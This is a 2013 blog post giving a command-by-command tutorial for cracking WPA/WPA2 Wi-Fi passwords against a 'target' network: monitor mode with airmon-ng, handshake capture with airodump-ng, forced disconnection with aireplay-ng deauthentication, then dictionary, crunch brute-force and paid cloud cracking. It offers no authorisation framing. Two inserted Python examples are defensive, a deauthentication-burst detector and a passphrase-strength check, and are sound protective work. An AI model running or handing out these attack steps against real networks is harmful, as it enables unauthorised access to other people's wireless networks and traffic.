Saturday, April 13, 2013

Hacking WPA/WPA2

1. Start airmon-ng:

airmon-ng start wlan0


2. Monitor the wifi and keep it running! (The template line uses channel 3; put the channel of the target network after -c.)

airodump-ng -c 3 -w capturefile --bssid targetbssid --ivs mon0

e.g.,

airodump-ng -c 3 -w mytarget --bssid 00:11:22:33:44:55 --ivs mon0


3. Open a new terminal.

aireplay-ng -0 1 -a targetbssid -c yourmacaddress mon0

e.g.,

aireplay-ng -0 1 -a 00:11:22:33:44:55 -c 55:44:33:22:11:00 mon0

Wait for the handshake!
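The aireplay-ng step above works by sending deauthentication frames, and a burst of them is exactly what a wireless IDS looks for. The following is an added example, not code from the original post: a small detector that parses the 802.11 management-frame header directly (no third-party library) and flags any BSSID/station pair that received a burst of deauth or disassociation frames inside a short window. The frames, timestamps, reason codes and the detection window and threshold are all constructed for the demonstration; in practice you would feed it frames read from a monitor-mode capture.

```python
# Added example (not from the original post): detect deauthentication bursts
# in a sequence of 802.11 management frames. Frames below are constructed.
import struct
from collections import defaultdict

SUBTYPE_BEACON = 0x8
SUBTYPE_DISASSOC = 0xA
SUBTYPE_DEAUTH = 0xC
MGMT_HDR_LEN = 24  # frame control, duration, addr1-3, sequence control


def mac_to_bytes(mac):
    return bytes.fromhex(mac.replace(":", ""))


def bytes_to_mac(raw):
    return ":".join(f"{b:02x}" for b in raw)


def build_mgmt_frame(subtype, dst, src, bssid, reason=None):
    """Construct a minimal 802.11 management frame (constructed test data)."""
    frame_control = bytes([subtype << 4, 0x00])  # type 0 = management, no flags
    duration = b"\x3a\x01"
    seq_ctrl = b"\x00\x00"
    frame = (frame_control + duration + mac_to_bytes(dst) + mac_to_bytes(src)
             + mac_to_bytes(bssid) + seq_ctrl)
    if reason is not None:
        frame += struct.pack("<H", reason)  # deauth/disassoc body: reason code
    return frame


def parse_mgmt_frame(frame):
    """Return (subtype, dst, src, bssid, reason) or None if not a management frame."""
    if len(frame) < MGMT_HDR_LEN:
        return None
    fc = frame[0]
    if (fc >> 2) & 0x3 != 0:  # type bits: 0 = management
        return None
    subtype = (fc >> 4) & 0xF
    dst, src, bssid = (bytes_to_mac(frame[i:i + 6]) for i in (4, 10, 16))
    reason = None
    if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC) and len(frame) >= MGMT_HDR_LEN + 2:
        reason = struct.unpack("<H", frame[MGMT_HDR_LEN:MGMT_HDR_LEN + 2])[0]
    return subtype, dst, src, bssid, reason


def detect_deauth_bursts(frames, window=2.0, threshold=5):
    """frames: iterable of (timestamp_seconds, raw_frame).
    Returns {(bssid, dst): peak_count} for every pair that received at least
    `threshold` deauth/disassoc frames within any `window`-second span."""
    times_by_pair = defaultdict(list)
    for ts, raw in frames:
        parsed = parse_mgmt_frame(raw)
        if parsed is None:
            continue
        subtype, dst, _src, bssid, _reason = parsed
        if subtype in (SUBTYPE_DEAUTH, SUBTYPE_DISASSOC):
            times_by_pair[(bssid, dst)].append(ts)
    alerts = {}
    for pair, times in times_by_pair.items():
        times.sort()
        start = 0
        for end in range(len(times)):  # sliding window over sorted timestamps
            while times[end] - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                alerts[pair] = max(alerts.get(pair, 0), count)
    return alerts


AP = "00:11:22:33:44:55"      # BSSID used in the example above
CLIENT = "55:44:33:22:11:00"  # station MAC used in the example above

# Constructed capture: beacons, one isolated deauth, then an 8-frame burst.
SAMPLE_FRAMES = [(t, build_mgmt_frame(SUBTYPE_BEACON, "ff:ff:ff:ff:ff:ff", AP, AP))
                 for t in (0.0, 5.0, 10.0)]
SAMPLE_FRAMES.append((0.5, build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, reason=3)))
SAMPLE_FRAMES += [(10.0 + i / 10, build_mgmt_frame(SUBTYPE_DEAUTH, CLIENT, AP, AP, reason=7))
                  for i in range(8)]

if __name__ == "__main__":
    for (bssid, dst), n in detect_deauth_bursts(SAMPLE_FRAMES).items():
        print(f"deauth burst: {n} frames from BSSID {bssid} to {dst}")
```

The single deauth at 0.5 s is a normal disconnect and never trips the threshold; the eight frames packed into 0.7 s do. Keying on the (BSSID, destination) pair rather than the source lets the detector catch spoofed frames, since the forged frames carry the access point's own address as source.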



4. Crack the code!! There are many ways to do it; mostly you will need a word dictionary.

a. Using aircrack-ng:

aircrack-ng -w yourworddictionary yourtargetivsfile

e.g.,

aircrack-ng -w /pentest/password/john/password.lst mytarget-01.ivs


b. crunch. Download it from http://sourceforge.net/projects/crunch-wordlist/files/crunch-wordlist/

Install it and use it like this:

/pentest/password/crunch/crunch/crunch 8 16 -f /pentest/password/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng yourtargetivsfile -b targetbssid -w -

e.g.,

/pentest/password/crunch/crunch/crunch 8 16 -f /pentest/password/crunch/charset.lst mixalpha-numeric-all-space-sv | aircrack-ng mytarget-01.ivs -b 00:11:22:33:44:55 -w -

This method runs the 2 commands at the same time: "-w -" makes aircrack-ng read the candidate passwords from crunch's output on standard input instead of from a file. CAUTION: crunch will generate a dictionary of every password from 8 to 16 characters long using all alphabetic, numeric and symbol characters. It can be around > 30 GB!
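Both options above are guessing attacks, so their cost is decided by the size of the space the passphrase lives in. The following is an added example, not code from the original post, that works the numbers through for a defender: the number of candidates crunch would emit for the 8 to 16 character run above, the disk a written-out list would need (which is why the command pipes crunch straight into aircrack-ng), the years an exhaustive search would take at a given rate, and a policy check a network owner can run on a candidate WPA2 passphrase. Assumptions: 95 characters stands in for the mixalpha-numeric-all-space charset, the guess rate is a placeholder, and COMMON_WORDS is a constructed stand-in for password.lst.

```python
# Added example (not from the original post): cost of brute force against a
# WPA2-PSK and a passphrase policy check. Rates and lists are assumptions.
import math

CHARSET_SIZE = 95  # assumed: upper + lower + digits + symbols + space
SECONDS_PER_YEAR = 365.25 * 24 * 3600


def keyspace(charset_size, min_len, max_len):
    """Candidates crunch would emit for every length in min_len..max_len."""
    return sum(charset_size ** n for n in range(min_len, max_len + 1))


def wordlist_bytes(charset_size, min_len, max_len):
    """Disk a written-out list would need: each candidate plus a newline."""
    return sum(charset_size ** n * (n + 1) for n in range(min_len, max_len + 1))


def years_to_exhaust(candidates, guesses_per_second):
    return candidates / guesses_per_second / SECONDS_PER_YEAR


def charset_of(passphrase):
    """Size of the smallest crunch-style charset that covers the passphrase."""
    size = 0
    if any(c.islower() for c in passphrase):
        size += 26
    if any(c.isupper() for c in passphrase):
        size += 26
    if any(c.isdigit() for c in passphrase):
        size += 10
    if any(not c.isalnum() for c in passphrase):
        size += 33  # symbols and space
    return size


def check_wpa2_passphrase(passphrase, wordlist, min_bits=60):
    """WPA2-PSK passphrases are 8..63 printable ASCII characters. Reject
    anything that is in the wordlist (option a) or that a brute-force run
    (option b) could cover in fewer than min_bits of work."""
    if not (8 <= len(passphrase) <= 63) or not passphrase.isascii() \
            or not passphrase.isprintable():
        return False, "must be 8..63 printable ASCII characters"
    if passphrase.lower() in wordlist:
        return False, "appears in the wordlist"
    bits = len(passphrase) * math.log2(charset_of(passphrase))
    if bits < min_bits:
        return False, f"only {bits:.0f} bits against brute force"
    return True, f"ok, {bits:.0f} bits"


# Constructed stand-in for password.lst; a real list has millions of entries.
COMMON_WORDS = {"password", "12345678", "qwertyuiop", "letmein123"}

if __name__ == "__main__":
    rate = 1e5  # assumed guesses per second; WPA2's PBKDF2 keeps this low
    space = keyspace(CHARSET_SIZE, 8, 16)
    print(f"8-16 char keyspace: {space:.3e} candidates, "
          f"{wordlist_bytes(CHARSET_SIZE, 8, 16):.3e} bytes if written to disk")
    print(f"years to exhaust at {rate:.0e} guesses/s: {years_to_exhaust(space, rate):.3e}")
    for pw in ("password", "summer2013", "Tr0ub4dor&3", "correct horse battery staple"):
        print(pw, check_wpa2_passphrase(pw, COMMON_WORDS))
```

The policy check rejects "summer2013" not because it is in the list but because ten characters drawn from lowercase plus digits sit well under 60 bits; a long all-lowercase phrase with spaces passes because length dominates the estimate.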


c. Using cloud services. Cracking WPA/WPA2 needs more effort and a killer machine to recover the password, so if you don't have the time or enough resources you can use a cloud service.

Go to http://www.cloudcracker.com

Upload your handshake file (it can be your *.cap file), enter your target SSID and then just follow the wizard. CAUTION: this service is not FREE!! You must pay for it!!
